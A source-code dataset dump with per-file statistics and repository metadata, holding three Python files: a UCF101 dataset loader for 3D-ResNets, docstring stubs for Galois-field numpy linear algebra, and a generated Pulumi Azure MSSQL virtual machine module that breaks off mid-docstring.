| 0
| 0
| 1
| 0.038052
| false
| 0.006088
| 0.006088
| 0
| 0.08067
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1eca5040063c79932c73223d4f412a91e61d79e8
| 2,857
|
py
|
Python
|
dataset_decoder.py
|
okwrtdsh/3D-ResNets-PyTorch
|
f36a32ea8b283524d1d102937c49689b1f475b5f
|
[
"MIT"
] | null | null | null |
dataset_decoder.py
|
okwrtdsh/3D-ResNets-PyTorch
|
f36a32ea8b283524d1d102937c49689b1f475b5f
|
[
"MIT"
] | null | null | null |
dataset_decoder.py
|
okwrtdsh/3D-ResNets-PyTorch
|
f36a32ea8b283524d1d102937c49689b1f475b5f
|
[
"MIT"
] | null | null | null |
from datasets.ucf101_decoder import UCF101
def get_training_set(opt,
                     common_temporal_transform,
                     common_spatial_transform,
                     target_spatial_transform,
                     input_spatial_transform,
                     target_label_transform
                     ):
    """Build the training-split dataset for the configured dataset.

    Only ``'ucf101'`` is supported; any other ``opt.dataset`` fails the assert.
    """
    assert opt.dataset in ['ucf101']
    if opt.dataset == 'ucf101':
        dataset = UCF101(
            opt.video_path,
            opt.annotation_path,
            'training',
            common_temporal_transform=common_temporal_transform,
            common_spatial_transform=common_spatial_transform,
            target_spatial_transform=target_spatial_transform,
            input_spatial_transform=input_spatial_transform,
            target_label_transform=target_label_transform,
            sample_duration=opt.sample_duration)
    return dataset
def get_validation_set(opt,
                       common_temporal_transform,
                       common_spatial_transform,
                       target_spatial_transform,
                       input_spatial_transform,
                       target_label_transform
                       ):
    """Build the validation-split dataset for the configured dataset.

    Only ``'ucf101'`` is supported; ``opt.n_val_samples`` controls how many
    clips are drawn per video.
    """
    assert opt.dataset in ['ucf101']
    if opt.dataset == 'ucf101':
        dataset = UCF101(
            opt.video_path,
            opt.annotation_path,
            'validation',
            opt.n_val_samples,
            common_temporal_transform=common_temporal_transform,
            common_spatial_transform=common_spatial_transform,
            target_spatial_transform=target_spatial_transform,
            input_spatial_transform=input_spatial_transform,
            target_label_transform=target_label_transform,
            sample_duration=opt.sample_duration)
    return dataset
def get_test_set(opt,
                 common_temporal_transform,
                 common_spatial_transform,
                 target_spatial_transform,
                 input_spatial_transform,
                 target_label_transform,
                 n_samples=10
                 ):
    """Build the test-time dataset for ``opt.test_subset``.

    Only ``'ucf101'`` is supported.  ``opt.test_subset`` selects which
    annotation split backs the test run: ``'val'`` -> ``'validation'``,
    ``'test'`` -> ``'testing'``.

    :param n_samples: clips sampled per video.  Previously hard-coded to 10;
        now a keyword with the same default so existing callers see identical
        behavior while new callers can tune it.
    """
    assert opt.dataset in ['ucf101']
    assert opt.test_subset in ['val', 'test']
    if opt.test_subset == 'val':
        subset = 'validation'
    elif opt.test_subset == 'test':
        subset = 'testing'
    if opt.dataset == 'ucf101':
        test_data = UCF101(
            opt.video_path,
            opt.annotation_path,
            subset,
            n_samples,
            common_temporal_transform=common_temporal_transform,
            common_spatial_transform=common_spatial_transform,
            target_spatial_transform=target_spatial_transform,
            input_spatial_transform=input_spatial_transform,
            target_label_transform=target_label_transform,
            sample_duration=opt.sample_duration)
    return test_data
| 33.22093
| 64
| 0.60658
| 263
| 2,857
| 6.13308
| 0.140684
| 0.267824
| 0.204588
| 0.16181
| 0.822071
| 0.822071
| 0.822071
| 0.822071
| 0.749535
| 0.749535
| 0
| 0.018548
| 0.339517
| 2,857
| 85
| 65
| 33.611765
| 0.836248
| 0
| 0
| 0.689189
| 0
| 0
| 0.029751
| 0
| 0
| 0
| 0
| 0
| 0.054054
| 1
| 0.040541
| false
| 0
| 0.013514
| 0
| 0.094595
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
1ecc7d1c94a99e1b6614a3c6414a05ececa7eb38
| 3,203
|
py
|
Python
|
np/linalg.py
|
BK-Modding/galois
|
5da4db84d90083e337ebe2c1838df5c6db88fd3f
|
[
"MIT"
] | null | null | null |
np/linalg.py
|
BK-Modding/galois
|
5da4db84d90083e337ebe2c1838df5c6db88fd3f
|
[
"MIT"
] | null | null | null |
np/linalg.py
|
BK-Modding/galois
|
5da4db84d90083e337ebe2c1838df5c6db88fd3f
|
[
"MIT"
] | null | null | null |
def matrix_rank(x):
    """
    Returns the rank of a Galois field matrix.

    References
    ----------
    * https://numpy.org/doc/stable/reference/generated/numpy.linalg.matrix_rank.html

    Examples
    --------
    .. ipython:: python

        GF = galois.GF(31)
        A = GF.Identity(4); A
        np.linalg.matrix_rank(A)

    One column is a linear combination of another.

    .. ipython:: python

        GF = galois.GF(31)
        A = GF.Random((4,4)); A
        A[:,2] = A[:,1] * GF(17); A
        np.linalg.matrix_rank(A)

    One row is a linear combination of another.

    .. ipython:: python

        GF = galois.GF(31)
        A = GF.Random((4,4)); A
        A[3,:] = A[2,:] * GF(8); A
        np.linalg.matrix_rank(A)
    """
    # NOTE(review): documentation-only stub — the bare ``return`` yields None.
    # The real computation presumably lives in the library's numpy overrides;
    # confirm before calling this function directly.
    return
def matrix_power(x):
    """
    Raises a square Galois field matrix to an integer power.

    References
    ----------
    * https://numpy.org/doc/stable/reference/generated/numpy.linalg.matrix_power.html

    Examples
    --------
    .. ipython:: python

        GF = galois.GF(31)
        A = GF.Random((3,3)); A
        np.linalg.matrix_power(A, 3)
        A @ A @ A

    .. ipython:: python

        GF = galois.GF(31)
        # Ensure A is full rank and invertible
        while True:
            A = GF.Random((3,3))
            if np.linalg.matrix_rank(A) == 3:
                break
        A
        np.linalg.matrix_power(A, -3)
        A_inv = np.linalg.inv(A)
        A_inv @ A_inv @ A_inv
    """
    # NOTE(review): documentation-only stub — the bare ``return`` yields None.
    # The real computation presumably lives in the library's numpy overrides;
    # confirm before calling this function directly.
    return
def det(A):
    """
    Computes the determinant of the matrix.

    References
    ----------
    * https://numpy.org/doc/stable/reference/generated/numpy.linalg.det.html

    Examples
    --------
    .. ipython:: python

        GF = galois.GF(31)
        A = GF.Random((2,2)); A
        np.linalg.det(A)
        A[0,0]*A[1,1] - A[0,1]*A[1,0]
    """
    # NOTE(review): documentation-only stub — the bare ``return`` yields None.
    # The real computation presumably lives in the library's numpy overrides;
    # confirm before calling this function directly.
    return
def inv(A):
    """
    Computes the inverse of the matrix.

    References
    ----------
    * https://numpy.org/doc/stable/reference/generated/numpy.linalg.inv.html

    Examples
    --------
    .. ipython:: python

        GF = galois.GF(31)
        # Ensure A is full rank and invertible
        while True:
            A = GF.Random((3,3))
            if np.linalg.matrix_rank(A) == 3:
                break
        A
        A_inv = np.linalg.inv(A); A_inv
        A_inv @ A
    """
    # NOTE(review): documentation-only stub — the bare ``return`` yields None.
    # The real computation presumably lives in the library's numpy overrides;
    # confirm before calling this function directly.
    return
def solve(x):
    """
    Solves the system of linear equations.

    References
    ----------
    * https://numpy.org/doc/stable/reference/generated/numpy.linalg.solve.html

    Examples
    --------
    .. ipython:: python

        GF = galois.GF(31)
        # Ensure A is full rank and invertible
        while True:
            A = GF.Random((4,4))
            if np.linalg.matrix_rank(A) == 4:
                break
        A
        b = GF.Random(4); b
        x = np.linalg.solve(A, b); x
        A @ x

    .. ipython:: python

        GF = galois.GF(31)
        # Ensure A is full rank and invertible
        while True:
            A = GF.Random((4,4))
            if np.linalg.matrix_rank(A) == 4:
                break
        A
        B = GF.Random((4,2)); B
        X = np.linalg.solve(A, B); X
        A @ X
    """
    # NOTE(review): documentation-only stub — the bare ``return`` yields None.
    # The real computation presumably lives in the library's numpy overrides;
    # confirm before calling this function directly.
    return
| 20.934641
| 85
| 0.499844
| 428
| 3,203
| 3.693925
| 0.156542
| 0.070841
| 0.085389
| 0.119545
| 0.802657
| 0.801392
| 0.788741
| 0.759646
| 0.731815
| 0.731815
| 0
| 0.028176
| 0.346238
| 3,203
| 152
| 86
| 21.072368
| 0.726839
| 0.806744
| 0
| 0.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 10
|
94d9ac9bc28ad31229ba01fc7419406888fe9d62
| 38,013
|
py
|
Python
|
sdk/python/pulumi_azure/mssql/virtual_machine.py
|
ScriptBox99/pulumi-azure
|
1b8c6d5479ccabc39094741eac25a8ca44c8833a
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/mssql/virtual_machine.py
|
ScriptBox99/pulumi-azure
|
1b8c6d5479ccabc39094741eac25a8ca44c8833a
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/mssql/virtual_machine.py
|
ScriptBox99/pulumi-azure
|
1b8c6d5479ccabc39094741eac25a8ca44c8833a
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['VirtualMachineArgs', 'VirtualMachine']
@pulumi.input_type
class VirtualMachineArgs:
    # NOTE: emitted by the Pulumi Terraform Bridge (tfgen) — per the file-header
    # warning, prefer regenerating over hand-editing this class.
    def __init__(__self__, *,
                 sql_license_type: pulumi.Input[str],
                 virtual_machine_id: pulumi.Input[str],
                 auto_backup: Optional[pulumi.Input['VirtualMachineAutoBackupArgs']] = None,
                 auto_patching: Optional[pulumi.Input['VirtualMachineAutoPatchingArgs']] = None,
                 key_vault_credential: Optional[pulumi.Input['VirtualMachineKeyVaultCredentialArgs']] = None,
                 r_services_enabled: Optional[pulumi.Input[bool]] = None,
                 sql_connectivity_port: Optional[pulumi.Input[int]] = None,
                 sql_connectivity_type: Optional[pulumi.Input[str]] = None,
                 sql_connectivity_update_password: Optional[pulumi.Input[str]] = None,
                 sql_connectivity_update_username: Optional[pulumi.Input[str]] = None,
                 storage_configuration: Optional[pulumi.Input['VirtualMachineStorageConfigurationArgs']] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
        """
        The set of arguments for constructing a VirtualMachine resource.
        :param pulumi.Input[str] sql_license_type: The SQL Server license type. Possible values are `AHUB` (Azure Hybrid Benefit) and `PAYG` (Pay-As-You-Go). Changing this forces a new resource to be created.
        :param pulumi.Input[str] virtual_machine_id: The ID of the Virtual Machine. Changing this forces a new resource to be created.
        :param pulumi.Input['VirtualMachineAutoBackupArgs'] auto_backup: An `auto_backup` block as defined below. This block can be added to an existing resource, but removing this block forces a new resource to be created.
        :param pulumi.Input['VirtualMachineAutoPatchingArgs'] auto_patching: An `auto_patching` block as defined below.
        :param pulumi.Input['VirtualMachineKeyVaultCredentialArgs'] key_vault_credential: (Optional) An `key_vault_credential` block as defined below.
        :param pulumi.Input[bool] r_services_enabled: Should R Services be enabled?
        :param pulumi.Input[int] sql_connectivity_port: The SQL Server port. Defaults to `1433`.
        :param pulumi.Input[str] sql_connectivity_type: The connectivity type used for this SQL Server. Defaults to `PRIVATE`.
        :param pulumi.Input[str] sql_connectivity_update_password: The SQL Server sysadmin login password.
        :param pulumi.Input[str] sql_connectivity_update_username: The SQL Server sysadmin login to create.
        :param pulumi.Input['VirtualMachineStorageConfigurationArgs'] storage_configuration: An `storage_configuration` block as defined below.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
        """
        # Required arguments are always recorded in the Pulumi input state.
        pulumi.set(__self__, "sql_license_type", sql_license_type)
        pulumi.set(__self__, "virtual_machine_id", virtual_machine_id)
        # Optional arguments are recorded only when explicitly provided.
        if auto_backup is not None:
            pulumi.set(__self__, "auto_backup", auto_backup)
        if auto_patching is not None:
            pulumi.set(__self__, "auto_patching", auto_patching)
        if key_vault_credential is not None:
            pulumi.set(__self__, "key_vault_credential", key_vault_credential)
        if r_services_enabled is not None:
            pulumi.set(__self__, "r_services_enabled", r_services_enabled)
        if sql_connectivity_port is not None:
            pulumi.set(__self__, "sql_connectivity_port", sql_connectivity_port)
        if sql_connectivity_type is not None:
            pulumi.set(__self__, "sql_connectivity_type", sql_connectivity_type)
        if sql_connectivity_update_password is not None:
            pulumi.set(__self__, "sql_connectivity_update_password", sql_connectivity_update_password)
        if sql_connectivity_update_username is not None:
            pulumi.set(__self__, "sql_connectivity_update_username", sql_connectivity_update_username)
        if storage_configuration is not None:
            pulumi.set(__self__, "storage_configuration", storage_configuration)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)

    # The properties below delegate to pulumi.get/pulumi.set under the wire
    # name declared in each @pulumi.getter decorator.
    @property
    @pulumi.getter(name="sqlLicenseType")
    def sql_license_type(self) -> pulumi.Input[str]:
        """
        The SQL Server license type. Possible values are `AHUB` (Azure Hybrid Benefit) and `PAYG` (Pay-As-You-Go). Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "sql_license_type")

    @sql_license_type.setter
    def sql_license_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "sql_license_type", value)

    @property
    @pulumi.getter(name="virtualMachineId")
    def virtual_machine_id(self) -> pulumi.Input[str]:
        """
        The ID of the Virtual Machine. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "virtual_machine_id")

    @virtual_machine_id.setter
    def virtual_machine_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "virtual_machine_id", value)

    @property
    @pulumi.getter(name="autoBackup")
    def auto_backup(self) -> Optional[pulumi.Input['VirtualMachineAutoBackupArgs']]:
        """
        An `auto_backup` block as defined below. This block can be added to an existing resource, but removing this block forces a new resource to be created.
        """
        return pulumi.get(self, "auto_backup")

    @auto_backup.setter
    def auto_backup(self, value: Optional[pulumi.Input['VirtualMachineAutoBackupArgs']]):
        pulumi.set(self, "auto_backup", value)

    @property
    @pulumi.getter(name="autoPatching")
    def auto_patching(self) -> Optional[pulumi.Input['VirtualMachineAutoPatchingArgs']]:
        """
        An `auto_patching` block as defined below.
        """
        return pulumi.get(self, "auto_patching")

    @auto_patching.setter
    def auto_patching(self, value: Optional[pulumi.Input['VirtualMachineAutoPatchingArgs']]):
        pulumi.set(self, "auto_patching", value)

    @property
    @pulumi.getter(name="keyVaultCredential")
    def key_vault_credential(self) -> Optional[pulumi.Input['VirtualMachineKeyVaultCredentialArgs']]:
        """
        (Optional) An `key_vault_credential` block as defined below.
        """
        return pulumi.get(self, "key_vault_credential")

    @key_vault_credential.setter
    def key_vault_credential(self, value: Optional[pulumi.Input['VirtualMachineKeyVaultCredentialArgs']]):
        pulumi.set(self, "key_vault_credential", value)

    @property
    @pulumi.getter(name="rServicesEnabled")
    def r_services_enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Should R Services be enabled?
        """
        return pulumi.get(self, "r_services_enabled")

    @r_services_enabled.setter
    def r_services_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "r_services_enabled", value)

    @property
    @pulumi.getter(name="sqlConnectivityPort")
    def sql_connectivity_port(self) -> Optional[pulumi.Input[int]]:
        """
        The SQL Server port. Defaults to `1433`.
        """
        return pulumi.get(self, "sql_connectivity_port")

    @sql_connectivity_port.setter
    def sql_connectivity_port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "sql_connectivity_port", value)

    @property
    @pulumi.getter(name="sqlConnectivityType")
    def sql_connectivity_type(self) -> Optional[pulumi.Input[str]]:
        """
        The connectivity type used for this SQL Server. Defaults to `PRIVATE`.
        """
        return pulumi.get(self, "sql_connectivity_type")

    @sql_connectivity_type.setter
    def sql_connectivity_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "sql_connectivity_type", value)

    @property
    @pulumi.getter(name="sqlConnectivityUpdatePassword")
    def sql_connectivity_update_password(self) -> Optional[pulumi.Input[str]]:
        """
        The SQL Server sysadmin login password.
        """
        return pulumi.get(self, "sql_connectivity_update_password")

    @sql_connectivity_update_password.setter
    def sql_connectivity_update_password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "sql_connectivity_update_password", value)

    @property
    @pulumi.getter(name="sqlConnectivityUpdateUsername")
    def sql_connectivity_update_username(self) -> Optional[pulumi.Input[str]]:
        """
        The SQL Server sysadmin login to create.
        """
        return pulumi.get(self, "sql_connectivity_update_username")

    @sql_connectivity_update_username.setter
    def sql_connectivity_update_username(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "sql_connectivity_update_username", value)

    @property
    @pulumi.getter(name="storageConfiguration")
    def storage_configuration(self) -> Optional[pulumi.Input['VirtualMachineStorageConfigurationArgs']]:
        """
        An `storage_configuration` block as defined below.
        """
        return pulumi.get(self, "storage_configuration")

    @storage_configuration.setter
    def storage_configuration(self, value: Optional[pulumi.Input['VirtualMachineStorageConfigurationArgs']]):
        pulumi.set(self, "storage_configuration", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A mapping of tags to assign to the resource.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)
@pulumi.input_type
class _VirtualMachineState:
    # NOTE: emitted by the Pulumi Terraform Bridge (tfgen) — per the file-header
    # warning, prefer regenerating over hand-editing this class.  Unlike
    # VirtualMachineArgs, every field here is optional (lookup/filter state).
    def __init__(__self__, *,
                 auto_backup: Optional[pulumi.Input['VirtualMachineAutoBackupArgs']] = None,
                 auto_patching: Optional[pulumi.Input['VirtualMachineAutoPatchingArgs']] = None,
                 key_vault_credential: Optional[pulumi.Input['VirtualMachineKeyVaultCredentialArgs']] = None,
                 r_services_enabled: Optional[pulumi.Input[bool]] = None,
                 sql_connectivity_port: Optional[pulumi.Input[int]] = None,
                 sql_connectivity_type: Optional[pulumi.Input[str]] = None,
                 sql_connectivity_update_password: Optional[pulumi.Input[str]] = None,
                 sql_connectivity_update_username: Optional[pulumi.Input[str]] = None,
                 sql_license_type: Optional[pulumi.Input[str]] = None,
                 storage_configuration: Optional[pulumi.Input['VirtualMachineStorageConfigurationArgs']] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 virtual_machine_id: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering VirtualMachine resources.
        :param pulumi.Input['VirtualMachineAutoBackupArgs'] auto_backup: An `auto_backup` block as defined below. This block can be added to an existing resource, but removing this block forces a new resource to be created.
        :param pulumi.Input['VirtualMachineAutoPatchingArgs'] auto_patching: An `auto_patching` block as defined below.
        :param pulumi.Input['VirtualMachineKeyVaultCredentialArgs'] key_vault_credential: (Optional) An `key_vault_credential` block as defined below.
        :param pulumi.Input[bool] r_services_enabled: Should R Services be enabled?
        :param pulumi.Input[int] sql_connectivity_port: The SQL Server port. Defaults to `1433`.
        :param pulumi.Input[str] sql_connectivity_type: The connectivity type used for this SQL Server. Defaults to `PRIVATE`.
        :param pulumi.Input[str] sql_connectivity_update_password: The SQL Server sysadmin login password.
        :param pulumi.Input[str] sql_connectivity_update_username: The SQL Server sysadmin login to create.
        :param pulumi.Input[str] sql_license_type: The SQL Server license type. Possible values are `AHUB` (Azure Hybrid Benefit) and `PAYG` (Pay-As-You-Go). Changing this forces a new resource to be created.
        :param pulumi.Input['VirtualMachineStorageConfigurationArgs'] storage_configuration: An `storage_configuration` block as defined below.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
        :param pulumi.Input[str] virtual_machine_id: The ID of the Virtual Machine. Changing this forces a new resource to be created.
        """
        # Arguments are recorded in the Pulumi input state only when provided.
        if auto_backup is not None:
            pulumi.set(__self__, "auto_backup", auto_backup)
        if auto_patching is not None:
            pulumi.set(__self__, "auto_patching", auto_patching)
        if key_vault_credential is not None:
            pulumi.set(__self__, "key_vault_credential", key_vault_credential)
        if r_services_enabled is not None:
            pulumi.set(__self__, "r_services_enabled", r_services_enabled)
        if sql_connectivity_port is not None:
            pulumi.set(__self__, "sql_connectivity_port", sql_connectivity_port)
        if sql_connectivity_type is not None:
            pulumi.set(__self__, "sql_connectivity_type", sql_connectivity_type)
        if sql_connectivity_update_password is not None:
            pulumi.set(__self__, "sql_connectivity_update_password", sql_connectivity_update_password)
        if sql_connectivity_update_username is not None:
            pulumi.set(__self__, "sql_connectivity_update_username", sql_connectivity_update_username)
        if sql_license_type is not None:
            pulumi.set(__self__, "sql_license_type", sql_license_type)
        if storage_configuration is not None:
            pulumi.set(__self__, "storage_configuration", storage_configuration)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if virtual_machine_id is not None:
            pulumi.set(__self__, "virtual_machine_id", virtual_machine_id)

    # The properties below delegate to pulumi.get/pulumi.set under the wire
    # name declared in each @pulumi.getter decorator.
    @property
    @pulumi.getter(name="autoBackup")
    def auto_backup(self) -> Optional[pulumi.Input['VirtualMachineAutoBackupArgs']]:
        """
        An `auto_backup` block as defined below. This block can be added to an existing resource, but removing this block forces a new resource to be created.
        """
        return pulumi.get(self, "auto_backup")

    @auto_backup.setter
    def auto_backup(self, value: Optional[pulumi.Input['VirtualMachineAutoBackupArgs']]):
        pulumi.set(self, "auto_backup", value)

    @property
    @pulumi.getter(name="autoPatching")
    def auto_patching(self) -> Optional[pulumi.Input['VirtualMachineAutoPatchingArgs']]:
        """
        An `auto_patching` block as defined below.
        """
        return pulumi.get(self, "auto_patching")

    @auto_patching.setter
    def auto_patching(self, value: Optional[pulumi.Input['VirtualMachineAutoPatchingArgs']]):
        pulumi.set(self, "auto_patching", value)

    @property
    @pulumi.getter(name="keyVaultCredential")
    def key_vault_credential(self) -> Optional[pulumi.Input['VirtualMachineKeyVaultCredentialArgs']]:
        """
        (Optional) An `key_vault_credential` block as defined below.
        """
        return pulumi.get(self, "key_vault_credential")

    @key_vault_credential.setter
    def key_vault_credential(self, value: Optional[pulumi.Input['VirtualMachineKeyVaultCredentialArgs']]):
        pulumi.set(self, "key_vault_credential", value)

    @property
    @pulumi.getter(name="rServicesEnabled")
    def r_services_enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Should R Services be enabled?
        """
        return pulumi.get(self, "r_services_enabled")

    @r_services_enabled.setter
    def r_services_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "r_services_enabled", value)

    @property
    @pulumi.getter(name="sqlConnectivityPort")
    def sql_connectivity_port(self) -> Optional[pulumi.Input[int]]:
        """
        The SQL Server port. Defaults to `1433`.
        """
        return pulumi.get(self, "sql_connectivity_port")

    @sql_connectivity_port.setter
    def sql_connectivity_port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "sql_connectivity_port", value)

    @property
    @pulumi.getter(name="sqlConnectivityType")
    def sql_connectivity_type(self) -> Optional[pulumi.Input[str]]:
        """
        The connectivity type used for this SQL Server. Defaults to `PRIVATE`.
        """
        return pulumi.get(self, "sql_connectivity_type")

    @sql_connectivity_type.setter
    def sql_connectivity_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "sql_connectivity_type", value)

    @property
    @pulumi.getter(name="sqlConnectivityUpdatePassword")
    def sql_connectivity_update_password(self) -> Optional[pulumi.Input[str]]:
        """
        The SQL Server sysadmin login password.
        """
        return pulumi.get(self, "sql_connectivity_update_password")

    @sql_connectivity_update_password.setter
    def sql_connectivity_update_password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "sql_connectivity_update_password", value)

    @property
    @pulumi.getter(name="sqlConnectivityUpdateUsername")
    def sql_connectivity_update_username(self) -> Optional[pulumi.Input[str]]:
        """
        The SQL Server sysadmin login to create.
        """
        return pulumi.get(self, "sql_connectivity_update_username")

    @sql_connectivity_update_username.setter
    def sql_connectivity_update_username(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "sql_connectivity_update_username", value)

    @property
    @pulumi.getter(name="sqlLicenseType")
    def sql_license_type(self) -> Optional[pulumi.Input[str]]:
        """
        The SQL Server license type. Possible values are `AHUB` (Azure Hybrid Benefit) and `PAYG` (Pay-As-You-Go). Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "sql_license_type")

    @sql_license_type.setter
    def sql_license_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "sql_license_type", value)

    @property
    @pulumi.getter(name="storageConfiguration")
    def storage_configuration(self) -> Optional[pulumi.Input['VirtualMachineStorageConfigurationArgs']]:
        """
        An `storage_configuration` block as defined below.
        """
        return pulumi.get(self, "storage_configuration")

    @storage_configuration.setter
    def storage_configuration(self, value: Optional[pulumi.Input['VirtualMachineStorageConfigurationArgs']]):
        pulumi.set(self, "storage_configuration", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A mapping of tags to assign to the resource.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)

    @property
    @pulumi.getter(name="virtualMachineId")
    def virtual_machine_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Virtual Machine. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "virtual_machine_id")

    @virtual_machine_id.setter
    def virtual_machine_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_machine_id", value)
class VirtualMachine(pulumi.CustomResource):
    # NOTE(review): provider-SDK class emitted by the Pulumi code generator;
    # edits here are comments/docs only so a regeneration does not conflict.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 auto_backup: Optional[pulumi.Input[pulumi.InputType['VirtualMachineAutoBackupArgs']]] = None,
                 auto_patching: Optional[pulumi.Input[pulumi.InputType['VirtualMachineAutoPatchingArgs']]] = None,
                 key_vault_credential: Optional[pulumi.Input[pulumi.InputType['VirtualMachineKeyVaultCredentialArgs']]] = None,
                 r_services_enabled: Optional[pulumi.Input[bool]] = None,
                 sql_connectivity_port: Optional[pulumi.Input[int]] = None,
                 sql_connectivity_type: Optional[pulumi.Input[str]] = None,
                 sql_connectivity_update_password: Optional[pulumi.Input[str]] = None,
                 sql_connectivity_update_username: Optional[pulumi.Input[str]] = None,
                 sql_license_type: Optional[pulumi.Input[str]] = None,
                 storage_configuration: Optional[pulumi.Input[pulumi.InputType['VirtualMachineStorageConfigurationArgs']]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 virtual_machine_id: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Manages a Microsoft SQL Virtual Machine

        ## Example Usage

        This example provisions a brief Managed MsSql Virtual Machine.

        ```python
        import pulumi
        import pulumi_azure as azure

        example_virtual_machine = azure.compute.get_virtual_machine(name="example-vm",
            resource_group_name="example-resources")
        example_mssql_virtual_machine_virtual_machine = azure.mssql.VirtualMachine("exampleMssql/virtualMachineVirtualMachine",
            virtual_machine_id=example_virtual_machine.id,
            sql_license_type="PAYG",
            r_services_enabled=True,
            sql_connectivity_port=1433,
            sql_connectivity_type="PRIVATE",
            sql_connectivity_update_password="Password1234!",
            sql_connectivity_update_username="sqllogin",
            auto_patching=azure.mssql.VirtualMachineAutoPatchingArgs(
                day_of_week="Sunday",
                maintenance_window_duration_in_minutes=60,
                maintenance_window_starting_hour=2,
            ))
        ```

        ## Import

        Sql Virtual Machines can be imported using the `resource id`, e.g.

        ```sh
         $ pulumi import azure:mssql/virtualMachine:VirtualMachine example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.SqlVirtualMachine/sqlVirtualMachines/example1
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[pulumi.InputType['VirtualMachineAutoBackupArgs']] auto_backup: An `auto_backup` block as defined below. This block can be added to an existing resource, but removing this block forces a new resource to be created.
        :param pulumi.Input[pulumi.InputType['VirtualMachineAutoPatchingArgs']] auto_patching: An `auto_patching` block as defined below.
        :param pulumi.Input[pulumi.InputType['VirtualMachineKeyVaultCredentialArgs']] key_vault_credential: (Optional) An `key_vault_credential` block as defined below.
        :param pulumi.Input[bool] r_services_enabled: Should R Services be enabled?
        :param pulumi.Input[int] sql_connectivity_port: The SQL Server port. Defaults to `1433`.
        :param pulumi.Input[str] sql_connectivity_type: The connectivity type used for this SQL Server. Defaults to `PRIVATE`.
        :param pulumi.Input[str] sql_connectivity_update_password: The SQL Server sysadmin login password.
        :param pulumi.Input[str] sql_connectivity_update_username: The SQL Server sysadmin login to create.
